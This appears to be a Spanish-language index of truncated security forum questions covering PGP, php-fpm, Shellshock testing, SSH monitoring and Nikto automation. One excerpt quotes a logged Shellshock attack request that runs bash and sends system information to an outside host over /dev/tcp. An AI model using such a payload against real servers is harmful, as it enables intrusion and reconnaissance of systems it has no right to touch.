Estoy aceptando informes de vulnerabilidad de seguridad pública para mi sitio web, y publico mi clave personal PGP (GPG) para alentar a las personas a cifrar sus comunicaciones.
Al recibir un mensaje cifrado, ¿cuál es la mejor manera de desci...
Entiendo que ejecutar apache / mod_php es seguro, pero no he escuchado sobre el caso de ejecutar php en modo fastcgi (a través de nginx / php5-fpm), entonces, ¿alguien puede confirmar que esto también es seguro?
Me doy cuenta de que las respuestas serán específicas para cada idioma, pero tengo curiosidad por saber qué términos buscarías al revisar algo en Github. Estaba buscando una herramienta de administración remota que podía usar con los clientes y...
Dado , es un requisito frecuente permitir a los usuarios sin privilegios acceso restringido a funciones privilegiadas: los administradores de sistemas de trabajo a veces proporcionan esto en forma de shellscripts, que luego se invocan a través...
Estoy intentando averiguar si mis dispositivos son vulnerables a bash shellshock. He ejecutado los comandos que se encuentran en enlace . Parece que mis dispositivos son susceptibles a una sola de las vulnerabilidades: Exploit 7 CVE-2014-6277,...
Acabo de encontrar esta entrada en uno de mis servidores:
213.165.70.245 - - [17/Jun/2015:01:58:22 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.2...
Preguntando esto porque aparentemente hay multiple personas que realmente no se dan cuenta qué idea tan mala es esta, y quiero que haya un lugar único y fácil de encontrar para que puedan ir y ser enviados.
Tengo una implementación de monitoreo bastante simple, digamos que el servidor de monitoreo se conecta a un objetivo a través de SSH a través de la autenticación de clave, y obtiene información de acuerdo a un script configurado como shell de in...
Estoy trabajando en la automatización de NIKTO. Tengo un archivo de texto que contiene una lista de direcciones IP junto con sus puertos abiertos. Ya he hecho un script nikto.
Funcionalidad de script: toma las direcciones IP y luego ejecuta n...